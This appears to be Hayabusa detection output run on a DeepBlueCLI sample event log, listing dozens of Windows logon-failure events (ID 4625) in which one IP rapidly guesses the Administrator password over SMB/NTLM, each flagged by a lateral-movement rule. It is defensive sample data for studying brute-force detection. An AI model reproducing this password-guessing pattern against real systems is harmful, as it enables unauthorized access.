01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 